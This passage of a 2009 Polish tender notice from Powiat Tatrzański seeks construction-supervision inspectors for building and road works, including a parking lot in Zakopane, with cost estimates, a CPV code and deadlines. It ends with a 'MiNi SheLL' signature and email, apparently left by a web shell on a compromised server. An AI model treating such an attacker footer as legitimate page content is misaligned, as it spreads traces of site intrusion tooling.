2) Zadaniem Wykonawcy jest zapewnienie kompleksowej obsługi prowadzonych robót  w zakresie pełnienia funkcji inspektora nadzoru inwestorskiego nad realizacją robót remontowych oraz inwestycyjnych w zakresie robót ogólnobudowlanych, które obejmują następujące branże:
a) Konstrukcyjno - budowlaną.
3) Zamawiający informuje, że prowadzenie robót określonych powyżej planuje się na okres od wiosny do jesieni 2009 roku.
4) Zamawiający informuje, że szacunkowa wartość nadzorowanych robót, na dzień wszczęcia niniejszego postępowania przetargowego, szacuje się na kwotę ok. 425.000,00 zł brutto. 
5) Ponadto Zamawiający informuje, że kwota podana w punkcie 4 powyżej jest kwotą szacunkową określoną na podstawie aktualnie obowiązującego planu finansowego oraz przed rozstrzygnięciem postępowań przetargowych mających na celu wyłonienie wykonawców robót budowlanych, w wyniku czego Zamawiającego zastrzega sobie prawo dokonania korekty wartości nadzorowanych robót (określonej powyżej) oraz planu finansowego, zgodnie z decyzjami podjętymi przez Zarządu Powiatu Tatrzańskiego, co może skutkować zwiększeniem lub ograniczeniem faktycznie wykonywanego zakresu usługi.
W związku z powyższym Zamawiający informuje, że zaoferowane przez Wykonawcę wynagrodzenie określone w wartości procentowej będzie stałe i nie będzie podlegało zmianie, natomiast może ulec zmianie wartość nadzorowanych robót.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet - Nr 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług będących przedmiotem niniejszego postępowania przetargowego, o których mowa wyżej, tj. wykonywania obowiązków inspektora nadzoru inwestorskiego nad realizacją robót budowlanych prowadzonych przez Powiat Tatrzański, w szczególności polega na: 
1) Wykonywaniu obowiązków inspektora nadzoru inwestorskiego nad realizacją robót remontowych oraz inwestycyjnych prowadzonych przez Powiat Tatrzański w roku 2009 w zakresie robót ogólnobudowlanych, które obejmują:
a) Budowa parkingu przy siedzibie Starostwa Powiatowego w Zakopanem, ul. Chramcówki 15.
2) Zadaniem Wykonawcy jest zapewnienie kompleksowej obsługi prowadzonych robót  w zakresie pełnienia funkcji inspektora nadzoru inwestorskiego nad realizacją robót remontowych oraz inwestycyjnych w zakresie robót ogólnobudowlanych, które obejmują następujące branże:
a) Konstrukcyjno - budowlaną,
b) Drogową.
3) Zamawiający informuje, że prowadzenie robót określonych powyżej planuje się na okres od wiosny do jesieni 2009 roku.
4) Zamawiający informuje, że szacunkowa wartość nadzorowanych robót, na dzień wszczęcia niniejszego postępowania przetargowego, szacuje się na kwotę ok. 560.000,00 zł brutto. 
5) Ponadto Zamawiający informuje, że kwota podana w punkcie 4 powyżej jest kwotą szacunkową określoną na podstawie aktualnie obowiązującego planu finansowego oraz przed rozstrzygnięciem postępowań przetargowych mających na celu wyłonienie wykonawców robót budowlanych, w wyniku czego Zamawiającego zastrzega sobie prawo dokonania korekty wartości nadzorowanych robót (określonej powyżej) oraz planu finansowego, zgodnie z decyzjami podjętymi przez Zarządu Powiatu Tatrzańskiego, co może skutkować zwiększeniem lub ograniczeniem faktycznie wykonywanego zakresu usługi.
W związku z powyższym Zamawiający informuje, że zaoferowane przez Wykonawcę wynagrodzenie określone w wartości procentowej będzie stałe i nie będzie podlegało zmianie, natomiast może ulec zmianie wartość nadzorowanych robót.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com